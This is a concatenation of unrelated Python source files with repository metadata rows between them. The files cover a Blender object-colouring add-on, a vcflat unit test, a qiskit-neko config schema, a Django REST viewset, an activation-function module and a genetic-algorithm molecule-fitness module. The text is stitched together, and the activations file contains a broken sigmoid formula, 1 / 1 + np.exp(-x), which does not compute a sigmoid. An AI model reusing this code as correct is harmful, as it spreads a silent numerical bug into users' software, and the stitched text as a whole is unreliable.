materials = getattr(obj.data, "materials", None)
return ((materials is not None) and
(any((test_name(rule, match_name, m.name) for m in materials if m is not None))))
@staticmethod
def LAYER(obj, rule, cache):
match_layers = rule.match_layers[:]
obj_layers = obj.layers[:]
return any((match_layers[i] and obj_layers[i]) for i in range(20))
@staticmethod
def TYPE(obj, rule, cache):
return (obj.type == rule.match_object_type)
@staticmethod
def EXPR(obj, rule, cache):
if not cache:
match_expr = rule.match_expr
expr = compile(match_expr, rule.name, 'eval')
namespace = {}
namespace.update(__import__("math").__dict__)
cache["expr"] = expr
cache["namespace"] = namespace
else:
expr = cache["expr"]
namespace = cache["namespace"]
try:
return bool(eval(expr, {}, {"self": obj}))
except:
import traceback
traceback.print_exc()
return False
class rule_draw:
__slots__ = ()
def __new__(cls, *args, **kwargs):
raise RuntimeError("%s should not be instantiated" % cls)
@staticmethod
def _generic_match_name(layout, rule):
layout.label(text="Match Name:")
row = layout.row(align=True)
row.prop(rule, "match_name", text="")
row.prop(rule, "use_match_regex", text="", icon='SORTALPHA')
@staticmethod
def NAME(layout, rule):
rule_draw._generic_match_name(layout, rule)
@staticmethod
def DATA(layout, rule):
rule_draw._generic_match_name(layout, rule)
@staticmethod
def GROUP(layout, rule):
rule_draw._generic_match_name(layout, rule)
@staticmethod
def MATERIAL(layout, rule):
rule_draw._generic_match_name(layout, rule)
@staticmethod
def TYPE(layout, rule):
row = layout.row()
row.prop(rule, "match_object_type")
@staticmethod
def LAYER(layout, rule):
row = layout.row()
row.prop(rule, "match_layers")
@staticmethod
def EXPR(layout, rule):
col = layout.column()
col.label(text="Scripted Expression:")
col.prop(rule, "match_expr", text="")
def object_colors_calc(rules, objects):
from mathutils import Color
rules_cb = [getattr(rule_test, rule.type) for rule in rules]
rules_blend = [(1.0 - rule.factor, rule.factor) for rule in rules]
rules_color = [Color(rule.color) for rule in rules]
rules_cache = [{} for i in range(len(rules))]
rules_inv = [rule.use_invert for rule in rules]
for obj in objects:
is_set = False
obj_color = Color(obj.color[0:3])
for (rule, test_cb, color, blend, cache, use_invert) \
in zip(rules, rules_cb, rules_color, rules_blend, rules_cache, rules_inv):
if test_cb(obj, rule, cache) is not use_invert:
if is_set is False:
obj_color = color
else:
# prevent mixing colors loosing saturation
obj_color_s = obj_color.s
obj_color = (obj_color * blend[0]) + (color * blend[1])
obj_color.s = (obj_color_s * blend[0]) + (color.s * blend[1])
is_set = True
if is_set:
obj.show_wire_color = True
obj.color[0:3] = obj_color
def object_colors_select(rule, objects):
cache = {}
rule_type = rule.type
test_cb = getattr(rule_test, rule_type)
for obj in objects:
obj.select = test_cb(obj, rule, cache)
def object_colors_rule_validate(rule, report):
rule_type = rule.type
if rule_type in {'NAME', 'DATA', 'GROUP', 'MATERIAL'}:
if rule.use_match_regex:
import re
try:
re.compile(rule.match_name)
except Exception as e:
report({'ERROR'}, "Rule %r: %s" % (rule.name, str(e)))
return False
elif rule_type == 'EXPR':
try:
compile(rule.match_expr, rule.name, 'eval')
except Exception as e:
report({'ERROR'}, "Rule %r: %s" % (rule.name, str(e)))
return False
return True
import bpy
from bpy.types import (
Operator,
Panel,
UIList,
)
from bpy.props import (
StringProperty,
BoolProperty,
IntProperty,
FloatProperty,
EnumProperty,
CollectionProperty,
BoolVectorProperty,
FloatVectorProperty,
)
class OBJECT_PT_color_rules(Panel):
bl_label = "Color Rules"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "object"
def draw(self, context):
layout = self.layout
scene = context.scene
# Rig type list
row = layout.row()
row.template_list(
"OBJECT_UL_color_rule", "color_rules",
scene, "color_rules",
scene, "color_rules_active_index")
col = row.column()
colsub = col.column(align=True)
colsub.operator("object.color_rules_add", icon='ADD', text="")
colsub.operator("object.color_rules_remove", icon='REMOVE', text="")
colsub = col.column(align=True)
colsub.operator("object.color_rules_move", text="", icon='TRIA_UP').direction = -1
colsub.operator("object.color_rules_move", text="", icon='TRIA_DOWN').direction = 1
colsub = col.column(align=True)
colsub.operator("object.color_rules_select", text="", icon='RESTRICT_SELECT_OFF')
if scene.color_rules:
index = scene.color_rules_active_index
rule = scene.color_rules[index]
box = layout.box()
row = box.row(align=True)
row.prop(rule, "name", text="")
row.prop(rule, "type", text="")
row.prop(rule, "use_invert", text="", icon='ARROW_LEFTRIGHT')
draw_cb = getattr(rule_draw, rule.type)
draw_cb(box, rule)
row = layout.split(0.75, align=True)
props = row.operator("object.color_rules_assign", text="Assign Selected")
props.use_selection = True
props = row.operator("object.color_rules_assign", text="All")
props.use_selection = False
class OBJECT_UL_color_rule(UIList):
def draw_item(self, context, layout, data, rule, icon, active_data, active_propname, index):
# assert(isinstance(rule, bpy.types.ShapeKey))
# scene = active_data
split = layout.split(0.5)
row = split.split(align=False)
row.label(text="%s (%s)" % (rule.name, rule.type.lower()))
split = split.split(0.7)
split.prop(rule, "factor", text="", emboss=False)
split.prop(rule, "color", text="")
class OBJECT_OT_color_rules_assign(Operator):
"""Assign colors to objects based on user rules"""
bl_idname = "object.color_rules_assign"
bl_label = "Assign Colors"
bl_options = {'UNDO'}
use_selection: BoolProperty(
name="Selected",
description="Apply to selected (otherwise all objects in the scene)",
default=True,
)
def execute(self, context):
scene = context.scene
if self.use_selection:
objects = context.selected_editable_objects
else:
objects = scene.objects
rules = scene.color_rules[:]
for rule in rules:
if not object_colors_rule_validate(rule, self.report):
return {'CANCELLED'}
object_colors_calc(rules, objects)
return {'FINISHED'}
class OBJECT_OT_color_rules_select(Operator):
"""Select objects matching the current rule"""
bl_idname = "object.color_rules_select"
bl_label = "Select Rule"
bl_options = {'UNDO'}
def execute(self, context):
scene = context.scene
rule = scene.color_rules[scene.color_rules_active_index]
if not object_colors_rule_validate(rule, self.report):
return {'CANCELLED'}
objects = context.visible_objects
object_colors_select(rule, objects)
return {'FINISHED'}
class OBJECT_OT_color_rules_add(Operator):
bl_idname = "object.color_rules_add"
bl_label = "Add Color Layer"
bl_options = {'UNDO'}
def execute(self, context):
scene = context.scene
rules = scene.color_rules
rule = rules.add()
rule.name = "Rule.%.3d" % len(rules)
scene.color_rules_active_index = len(rules) - 1
return {'FINISHED'}
class OBJECT_OT_color_rules_remove(Operator):
bl_idname = "object.color_rules_remove"
bl_label = "Remove Color Layer"
bl_options = {'UNDO'}
def execute(self, context):
scene = context.scene
rules = scene.color_rules
rules.remove(scene.color_rules_active_index)
if scene.color_rules_active_index > len(rules) - 1:
scene.color_rules_active_index = len(rules) - 1
return {'FINISHED'}
class OBJECT_OT_color_rules_move(Operator):
bl_idname = "object.color_rules_move"
bl_label = "Remove Color Layer"
bl_options = {'UNDO'}
direction: IntProperty()
def execute(self, context):
scene = context.scene
rules = scene.color_rules
index = scene.color_rules_active_index
index_new = index + self.direction
if index_new < len(rules) and index_new >= 0:
rules.move(index, index_new)
scene.color_rules_active_index = index_new
return {'FINISHED'}
else:
return {'CANCELLED'}
class ColorRule(bpy.types.PropertyGroup):
name: StringProperty(
name="Rule Name",
)
color: FloatVectorProperty(
name="Color",
description="Color to assign",
subtype='COLOR', size=3, min=0, max=1, precision=3, step=0.1,
default=(0.5, 0.5, 0.5),
)
factor: FloatProperty(
name="Opacity",
description="Color to assign",
min=0, max=1, precision=1, step=0.1,
default=1.0,
)
type: EnumProperty(
name="Rule Type",
items=(('NAME', "Name", ""),
('DATA', "Data Name", "Name of the object data"),
('GROUP', "Group Name", "Object in group"),
('MATERIAL', "Material Name", "Object uses material"),
('TYPE', "Type", "Object type"),
('LAYER', "Layer", "Object in layer"),
('EXPR', "Expression", "Scripted expression"),
),
)
use_invert: BoolProperty(
name="Invert",
description="Match when the rule isn't met",
)
# ------------------
# Matching Variables
# shared by all name matching
match_name: StringProperty(
name="Match Name",
)
use_match_regex: BoolProperty(
name="Regex",
description="Use regular expressions for pattern matching",
)
# type == 'LAYER'
match_layers = BoolVectorProperty(
name="Layers",
size=20,
subtype='LAYER',
)
# type == 'TYPE'
match_object_type: EnumProperty(
name="Object Type",
items=([(i.identifier, i.name, "")
for i in bpy.types.Object.bl_rna.properties['type'].enum_items]
)
)
# type == 'EXPR'
match_expr: StringProperty(
name="Expression",
description="Python expression, where 'self' is the object variable"
)
classes = (
OBJECT_PT_color_rules,
OBJECT_OT_color_rules_add,
OBJECT_OT_color_rules_remove,
OBJECT_OT_color_rules_move,
OBJECT_OT_color_rules_assign,
OBJECT_OT_color_rules_select,
OBJECT_UL_color_rule,
ColorRule,
)
def register():
for cls in classes:
bpy.utils.register_class(cls)
bpy.types.Scene.color_rules = CollectionProperty(type=ColorRule)
bpy.types.Scene.color_rules_active_index = IntProperty()
def unregister():
for cls in classes:
bpy.utils.unregister_class(cls)
del bpy.types.Scene.color_rules
| 30.506173 | 113 | 0.596857 |
114779832f44d374eeab22357254999500380424 | 751 | py | Python | vcflat/tests/test_VcfParse/test_sanitize_keys.py | arontommi/VCFlat | f707d8e564ec30c65e063eea305aa30cf698cc86 | [
"MIT"
] | 4 | 2019-11-29T12:59:12.000Z | 2020-01-28T15:30:44.000Z | vcflat/tests/test_VcfParse/test_sanitize_keys.py | arontommi/VCFlat | f707d8e564ec30c65e063eea305aa30cf698cc86 | [
"MIT"
] | 1 | 2022-01-04T22:58:58.000Z | 2022-01-04T22:58:58.000Z | vcflat/tests/test_VcfParse/test_sanitize_keys.py | arontommi/VCFlat | f707d8e564ec30c65e063eea305aa30cf698cc86 | [
"MIT"
] | 1 | 2020-01-28T15:31:29.000Z | 2020-01-28T15:31:29.000Z | import vcflat.VcfParse as VP
import os
import pytest
def get_input():
test_data_dir = os.path.join(os.path.dirname(__file__), "..", "test_data")
i = os.path.join(test_data_dir, "test.snpeff.vcf")
vcffile = VP.VcfParse(i)
return vcffile
def test_1():
""" Check i the keys are found in the header of the vcf and reported correcly back"""
vcffile = get_input()
keys = "#CHROM POS"
sanitized_keys = vcffile.sanitize_keys(keys)
assert sanitized_keys == ["#CHROM", "POS"]
def test_2(capsys):
""" assert an error if a key is not found"""
vcffile = get_input()
keys = "#CHROM POS Wrong_key"
vcffile.sanitize_keys(keys)
out, err = capsys.readouterr()
print(err)
assert "No" in err.split()
| 25.033333 | 89 | 0.660453 |
0d59e8cb16bef418e866500a570fda2c7d7e70db | 1,805 | py | Python | qiskit_neko/config.py | garrison/qiskit-neko | 50c6f0f6975425c7ff86417cedc094e984dc5d1c | [
"Apache-2.0"
] | 5 | 2022-01-11T16:07:48.000Z | 2022-02-01T22:05:34.000Z | qiskit_neko/config.py | garrison/qiskit-neko | 50c6f0f6975425c7ff86417cedc094e984dc5d1c | [
"Apache-2.0"
] | 1 | 2022-02-03T14:10:57.000Z | 2022-02-03T14:10:57.000Z | qiskit_neko/config.py | garrison/qiskit-neko | 50c6f0f6975425c7ff86417cedc094e984dc5d1c | [
"Apache-2.0"
] | 1 | 2022-03-07T15:06:21.000Z | 2022-03-07T15:06:21.000Z | # This code is part of Qiskit.
#
# (C) Copyright IBM 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Configuration file"""
import logging
import voluptuous as vol
import yaml
LOG = logging.getLogger(__name__)
LOG_LEVEL_VALIDATOR = vol.Any("DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL")
schema = vol.Schema(
{
vol.Optional("test_timeout"): vol.Coerce(float),
vol.Optional("backend_plugin", default="aer"): str,
vol.Optional("backend_selection"): str,
vol.Optional("backend_script"): str,
vol.Optional("default_log_level", default="INFO"): LOG_LEVEL_VALIDATOR,
vol.Optional("module_log_level"): {vol.Extra: LOG_LEVEL_VALIDATOR},
vol.Optional("log_format"): str,
vol.Optional("log_file"): str,
}
)
class NekoConfig:
"""The configuration class for Qiskit Neko."""
def __init__(self, filename=None):
"""Initialize a new configuration object.
:param str filename: The absolute path to the configuration file to
use for this configuration object
"""
self.filename = filename
self.config = None
if self.filename:
self.load_config()
def load_config(self):
"""Load the specified configuration file."""
with open(self.filename, "r", encoding="utf8") as fd:
raw_config = yaml.safe_load(fd.read())
self.config = schema(raw_config)
| 30.083333 | 79 | 0.67036 |
5d922ad9daeac39137413c21c3b00753eec6307d | 410 | py | Python | viewsets/change_serializer.py | R-Mielamud/Nicolaus | 05a28a19ca0127cf39b1238dc313cecd6e528c40 | [
"MIT"
] | null | null | null | viewsets/change_serializer.py | R-Mielamud/Nicolaus | 05a28a19ca0127cf39b1238dc313cecd6e528c40 | [
"MIT"
] | null | null | null | viewsets/change_serializer.py | R-Mielamud/Nicolaus | 05a28a19ca0127cf39b1238dc313cecd6e528c40 | [
"MIT"
] | 1 | 2021-03-09T16:06:23.000Z | 2021-03-09T16:06:23.000Z | from rest_framework.viewsets import ModelViewSet
class ChangeSerializerViewSet(ModelViewSet):
for_admin = False
def get_serializer_class(self):
if ((self.action == "list" or self.action == "retrieve") and
not (self.for_admin and self.request.GET.get("admin") == "1")):
return self.read_serializer_class
else:
return self.write_serializer_class
| 34.166667 | 79 | 0.665854 |
bbfdacdd057c71de652ec8de11e9d5e1e00c3cd6 | 322 | py | Python | activations.py | rpams/Neural_network | 6ef3227fb5fc69bcec8aa462e0f3d6ba17a8babf | [
"MIT"
] | 1 | 2020-06-15T14:09:48.000Z | 2020-06-15T14:09:48.000Z | activations.py | rpams/Neural_network | 6ef3227fb5fc69bcec8aa462e0f3d6ba17a8babf | [
"MIT"
] | null | null | null | activations.py | rpams/Neural_network | 6ef3227fb5fc69bcec8aa462e0f3d6ba17a8babf | [
"MIT"
] | null | null | null | import numpy as np
# activation functions and their derivative
def tanh(x):
return np.tanh(x)
def tanh_prime(x):
return 1 - np.tanh(x) ** 2
def sigmoid(x):
return 1 / 1 + np.exp(-x)
def sigmoid_prime(x):
return x * (1 - x)
def gauss(x):
return np.exp(-x)
def gauss_prime(x):
return -np.exp(-x) | 15.333333 | 43 | 0.624224 |
fee58240bada87e6d34af5a1cb6572a7a5b8f125 | 26,358 | py | Python | generation_props.py | schithranandanurix/GA | f4eb388116c45bbe178835f9da0d899199b1105c | [
"Apache-1.1"
] | null | null | null | generation_props.py | schithranandanurix/GA | f4eb388116c45bbe178835f9da0d899199b1105c | [
"Apache-1.1"
] | null | null | null | generation_props.py | schithranandanurix/GA | f4eb388116c45bbe178835f9da0d899199b1105c | [
"Apache-1.1"
] | null | null | null | '''
Functions that are used while a Generation is being Evaluated
'''
import os
import multiprocessing
from rdkit import Chem
import numpy as np
from random import randrange
import discriminator as D
import evolution_functions as evo
from SAS_calculator.sascorer import calculateScore
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
def calc_prop_logP(unseen_smile_ls, property_name, props_collect):
'''Calculate logP for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = evo.get_logP(mol) # Add calculation
else:
raise Exception('Invalid smile encountered while atempting to calculate logP')
def calc_prop_SAS(unseen_smile_ls, property_name, props_collect):
'''Calculate synthetic accesibility score for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = calculateScore(mol)
else:
raise Exception('Invalid smile encountered while atempting to calculate SAS')
def calc_prop_RingP(unseen_smile_ls, property_name, props_collect):
'''Calculate Ring penalty for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smi in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smi)
if did_convert:
cycle_list = mol.GetRingInfo().AtomRings()
if len(cycle_list) == 0:
cycle_length = 0
else:
cycle_length = max([ len(j) for j in cycle_list ])
if cycle_length <= 6:
cycle_length = 0
else:
cycle_length = cycle_length - 6
props_collect[property_name][smi] = cycle_length
else:
raise Exception('Invalid smile encountered while atempting to calculate Ring penalty')
def create_parr_process(chunks, property_name):
''' Create parallel processes for calculation of properties
'''
# Assign data to each process
process_collector = []
collect_dictionaries = []
for item in chunks:
props_collect = manager.dict(lock=True)
smiles_map_ = manager.dict(lock=True)
props_collect[property_name] = smiles_map_
collect_dictionaries.append(props_collect)
if property_name == 'logP':
process_collector.append(multiprocessing.Process(target=calc_prop_logP, args=(item, property_name, props_collect, )))
if property_name == 'SAS':
process_collector.append(multiprocessing.Process(target=calc_prop_SAS, args=(item, property_name, props_collect, )))
if property_name == 'RingP':
process_collector.append(multiprocessing.Process(target=calc_prop_RingP, args=(item, property_name, props_collect, )))
for item in process_collector:
item.start()
for item in process_collector: # wait for all parallel processes to finish
item.join()
combined_dict = {} # collect results from multiple processess
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item[property_name])
return combined_dict
def fitness(molecules_here, properties_calc_ls,
discriminator, disc_enc_type, generation_index,
max_molecules_len, device, num_processors, writer, beta,
data_dir, max_fitness_collector, impose_time_adapted_pen):
''' Calculate fitness fo a generation in the GA
All properties are standardized based on the mean & stddev of the zinc dataset
Parameters:
molecules_here (list) : List of a string of molecules
properties_calc_ls : Type of property to be shown to the descriminator
discriminator (torch.Model) : Pytorch classifier
disc_enc_type (string) : Indicated type of encoding shown to discriminator
generation_index (int) : Which generation indicator
max_molecules_len (int) : Largest mol length
device (string) : Device of discrimnator
num_processors (int) : Number of cpu processors to parallelize over
writer (tensorboardX writer obj) : Tensorboard graphing tool
beta (int) : Discriminator fitness parameter
data_dir (str) : Directory for saving data
max_fitness_collector (list) : List for collecting max fitness values
impose_time_adapted_pen (bool) : Impose time-adaptive discriminator penalty?
Returns:
fitness (np.array) : A lin comb of properties and
discriminator predictions
discriminator_predictions (np.array) : The predictions made by the discrimantor
'''
dataset_x = evo.obtain_discr_encoding(molecules_here, disc_enc_type, max_molecules_len, num_processors, generation_index)
if generation_index == 1:
discriminator_predictions = np.zeros((len(dataset_x),1))
else:
discriminator_predictions = D.do_predictions(discriminator, dataset_x, device)
if properties_calc_ls == None:
fitness = discriminator_predictions
else:
molecules_here_unique = list(set(molecules_here))
ratio = len(molecules_here_unique) / num_processors
chunks = evo.get_chunks(molecules_here_unique, num_processors, ratio)
chunks = [item for item in chunks if len(item) >= 1]
logP_results, SAS_results, ringP_results, QED_results = {}, {}, {}, {}
# Parallelize the calculation of logPs
if 'logP' in properties_calc_ls:
logP_results = create_parr_process(chunks, 'logP')
# Parallelize the calculation of SAS
if 'SAS' in properties_calc_ls:
SAS_results = create_parr_process(chunks, 'SAS')
# Parallize the calculation of Ring Penalty
if 'RingP' in properties_calc_ls:
ringP_results = create_parr_process(chunks, 'RingP')
if 'QED' in properties_calc_ls:
QED_results = {}
for smi in molecules_here:
QED_results[smi] = Chem.QED.qed(Chem.MolFromSmiles(smi))
logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, QED_results = obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, QED_results, properties_calc_ls)
# Add SAS and Ring Penalty
# Note: The fitness function must include the properties of var. 'properties_calc_ls'
fitness = (logP_norm) - (SAS_norm) # - (RingP_norm) i comment out ringp as i don't want to constrain ring size (based on discussions with angelica)
# Plot fitness without discriminator
writer.add_scalar('max fitness without discr', max(fitness), generation_index)
writer.add_scalar('avg fitness without discr', fitness.mean(), generation_index)
max_fitness_collector.append(max(fitness)[0])
## Impose the beta cuttoff! --------------------------
if impose_time_adapted_pen:
if generation_index > 100:
if len(set(max_fitness_collector[-5:])) == 1: # Check if there is a sagnation for 5 generations!
beta = 1000
print('Beta cutoff imposed index: ', generation_index)
f = open('{}/beta_change_log.txt'.format(data_dir), 'a+')
f.write(str(generation_index) + '\n')
f.close()
## beta cuttoff imposed! --------------------------
# max fitness without discriminator
f = open('{}/max_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness without discriminator
f = open('{}/avg_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
print('beta value: ', beta)
fitness = (beta * discriminator_predictions) + fitness
# Plot fitness with discriminator
writer.add_scalar('max fitness with discrm', max(fitness), generation_index)
writer.add_scalar('avg fitness with discrm', fitness.mean(), generation_index)
# max fitness with discriminator
f = open('{}/max_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness with discriminator
f = open('{}/avg_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
# Plot properties
writer.add_scalar('non standr max logp', max(logP_calculated), generation_index) # logP plots
writer.add_scalar('non standr mean logp', logP_calculated.mean(), generation_index)
writer.add_scalar('non standr min sas', min(SAS_calculated), generation_index) # SAS plots
writer.add_scalar('non standr mean sas', SAS_calculated.mean(), generation_index)
writer.add_scalar('non standr min ringp', min(RingP_calculated), generation_index) # RingP plots
writer.add_scalar('non standr mean ringp', RingP_calculated.mean(), generation_index)
# max logP - non standardized
f = open('{}/max_logp.txt'.format(data_dir), 'a+')
f.write(str(max(logP_calculated)) + '\n')
f.close()
# mean logP - non standardized
f = open('{}/avg_logp.txt'.format(data_dir), 'a+')
f.write(str(logP_calculated.mean()) + '\n')
f.close()
# min SAS - non standardized
f = open('{}/min_SAS.txt'.format(data_dir), 'a+')
f.write(str(min(SAS_calculated)) + '\n')
f.close()
# mean SAS - non standardized
f = open('{}/avg_SAS.txt'.format(data_dir), 'a+')
f.write(str(SAS_calculated.mean()) + '\n')
f.close()
# min RingP - non standardized
f = open('{}/min_RingP.txt'.format(data_dir), 'a+')
f.write(str(min(RingP_calculated)) + '\n')
f.close()
# mean RingP - non standardized
f = open('{}/avg_RingP.txt'.format(data_dir), 'a+')
f.write(str(RingP_calculated.mean()) + '\n')
f.close()
return fitness, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions
def obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, QED_results, properties_calc_ls):
''' Obtain calculated properties of molecules in molecules_here, and standardize
values base on properties of the Zinc Data set.
'''
logP_calculated = []
SAS_calculated = []
RingP_calculated = []
QED_calculated = []
for smi in molecules_here:
if 'logP' in properties_calc_ls:
logP_calculated.append(logP_results[smi])
if 'SAS' in properties_calc_ls:
SAS_calculated.append(SAS_results[smi])
if 'RingP' in properties_calc_ls:
RingP_calculated.append(ringP_results[smi])
if 'QED' in properties_calc_ls:
QED_calculated.append(QED_results[smi])
logP_calculated = np.array(logP_calculated)
SAS_calculated = np.array(SAS_calculated)
RingP_calculated = np.array(RingP_calculated)
QED_calculated = np.array(QED_calculated)
# Standardize logP based on zinc logP (mean: 2.4729421499641497 & std : 1.4157879815362406)
logP_norm = (logP_calculated - 2.4729421499641497) / 1.4157879815362406
logP_norm = logP_norm.reshape((logP_calculated.shape[0], 1))
# Standardize SAS based on zinc SAS(mean: 3.0470797085649894 & std: 0.830643172314514)
SAS_norm = (SAS_calculated - 3.0470797085649894) / 0.830643172314514
SAS_norm = SAS_norm.reshape((SAS_calculated.shape[0], 1))
# Standardiize RingP based on zinc RingP(mean: 0.038131530820234766 & std: 0.2240274735210179)
RingP_norm = (RingP_calculated - 0.038131530820234766) / 0.2240274735210179
RingP_norm = RingP_norm.reshape((RingP_calculated.shape[0], 1))
return logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, QED_calculated
def obtain_fitness(disc_enc_type, smiles_here, selfies_here, properties_calc_ls,
discriminator, generation_index, max_molecules_len, device,
generation_size, num_processors, writer, beta, image_dir,
data_dir, max_fitness_collector, impose_time_adapted_pen):
''' Obtain fitness of generation based on choices of disc_enc_type.
Essentially just calls 'fitness'
'''
# ANALYSE THE GENERATION
if disc_enc_type == 'smiles' or disc_enc_type == 'properties_rdkit':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions = fitness(smiles_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, max_fitness_collector, impose_time_adapted_pen)
elif disc_enc_type == 'selfies':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions = fitness(selfies_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, max_fitness_collector, impose_time_adapted_pen)
fitness_here = fitness_here.reshape((generation_size, ))
order, fitness_ordered, smiles_ordered, selfies_ordered = order_based_on_fitness(fitness_here, smiles_here, selfies_here)
# Order molecules based on ordering of 'smiles_ordered'
logP_calculated = [logP_calculated[idx] for idx in order]
SAS_calculated = [SAS_calculated[idx] for idx in order]
RingP_calculated = [RingP_calculated[idx] for idx in order]
discriminator_predictions = [discriminator_predictions[idx] for idx in order]
os.makedirs('{}/{}'.format(data_dir, generation_index))
# Write ordered smiles in a text file
f = open('{}/{}/smiles_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in smiles_ordered])
f.close()
# Write logP of ordered smiles in a text file
f = open('{}/{}/logP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in logP_calculated])
f.close()
# Write sas of ordered smiles in a text file
f = open('{}/{}/sas_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in SAS_calculated])
f.close()
# Write ringP of ordered smiles in a text file
f = open('{}/{}/ringP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in RingP_calculated])
f.close()
# Write discriminator predictions of ordered smiles in a text file
f = open('{}/{}/discrP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in discriminator_predictions])
f.close()
# Add the average & max discriminator score of a generation
writer.add_scalar('mean discriminator score', np.array(discriminator_predictions).mean(), generation_index)
writer.add_scalar('max discriminator score', max(discriminator_predictions), generation_index)
f = open('{}/avg_discr_score.txt'.format(data_dir), 'a+')
f.write(str(np.array(discriminator_predictions).mean()) + '\n')
f.close()
f = open('{}/max_discr_score.txt'.format(data_dir), 'a+')
f.write(str(max(discriminator_predictions)[0]) + '\n')
f.close()
#print statement for the best molecule in the generation
# print('Best best molecule in generation ', generation_index)
# print(' smile : ', smiles_ordered[0])
# print(' fitness: ', fitness_ordered[0])
# print(' logP : ', logP_calculated[0])
# print(' sas : ', SAS_calculated[0])
# print(' ringP : ', RingP_calculated[0])
# print(' discrm : ', discriminator_predictions[0])
f = open('{}/best_in_generations.txt'.format(data_dir), 'a+')
best_gen_str = 'index: {}, smile: {}, fitness: {}, logP: {}, sas: {}, ringP: {}, discrm: {}'.format(generation_index, smiles_ordered[0], fitness_ordered[0], logP_calculated[0], SAS_calculated[0], RingP_calculated[0], discriminator_predictions[0])
f.write(best_gen_str + '\n')
f.close()
show_generation_image(generation_index, image_dir, smiles_ordered, fitness_ordered, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions)
return fitness_here, order, fitness_ordered, smiles_ordered, selfies_ordered
def show_generation_image(generation_index, image_dir, smiles_ordered, fitness, logP, SAS, RingCount, discr_scores):
''' Plot 100 molecules with the best fitness in in a generation
Called after at the end of each generation. Image in each generation
is stored with name 'generation_index.png'
Images are stored in diretory './images'
'''
if generation_index > 1:
A = list(smiles_ordered)
A = A[:100]
if len(A) < 100 : return #raise Exception('Not enough molecules provided for plotting ', len(A))
A = [Chem.MolFromSmiles(x) for x in A]
evo.create_100_mol_image(A, "./{}/{}_ga.png".format(image_dir, generation_index), fitness, logP, SAS, RingCount, discr_scores)
def obtain_previous_gen_mol(starting_smiles, starting_selfies, generation_size,
generation_index, selfies_all, smiles_all):
'''Obtain molecules from one generation prior.
If generation_index is 1, only the the starting molecules are returned
Parameters:
Returns:
'''
# Obtain molecules from the previous generation
if generation_index == 1:
randomized_smiles = []
randomized_selfies = []
for i in range(generation_size): # nothing to obtain from previous gen
# So, choose random moleclues from the starting list
index = randrange(len(starting_smiles))
randomized_smiles.append(starting_smiles[index])
randomized_selfies.append(starting_selfies[index])
return randomized_smiles, randomized_selfies
else:
return smiles_all[generation_index-2], selfies_all[generation_index-2]
def order_based_on_fitness(fitness_here, smiles_here, selfies_here):
'''Order elements of a lists (args) based om Decreasing fitness
'''
order = np.argsort(fitness_here)[::-1] # Decreasing order of indices, based on fitness
fitness_ordered = [fitness_here[idx] for idx in order]
smiles_ordered = [smiles_here[idx] for idx in order]
selfies_ordered = [selfies_here[idx] for idx in order]
return order, fitness_ordered, smiles_ordered, selfies_ordered
def apply_generation_cutoff(order, generation_size):
''' Return of a list of indices of molecules that are kept (high fitness)
and a list of indices of molecules that are replaced (low fitness)
The cut-off is imposed using a Fermi-Function
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
generation_size (int) : number of molecules in a generation
Returns:
to_replace (list): indices of molecules that will be replaced by random mutations of
molecules in list 'to_keep'
to_keep (list): indices of molecules that will be kept for the following generations
'''
# Get the probabilities that a molecule with a given fitness will be replaced
# a fermi function is used to smoothen the transition
positions = np.array(range(0, len(order))) - 0.2*float(len(order))
probabilities = 1.0 / (1.0 + np.exp(-0.02 * generation_size * positions / float(len(order))))
# import matplotlib.pyplot as plt
# plt.plot(positions, probabilities)
# plt.show()
to_replace = [] # all molecules that are replaced
to_keep = [] # all molecules that are kept
for idx in range(0,len(order)):
if np.random.rand(1) < probabilities[idx]:
to_replace.append(idx)
else:
to_keep.append(idx)
return to_replace, to_keep
def obtain_next_gen_molecules(order, to_replace, to_keep,
selfies_ordered, smiles_ordered, max_molecules_len):
''' Obtain the next generation of molecules. Bad molecules are replaced by
mutations of good molecules
Parameters:
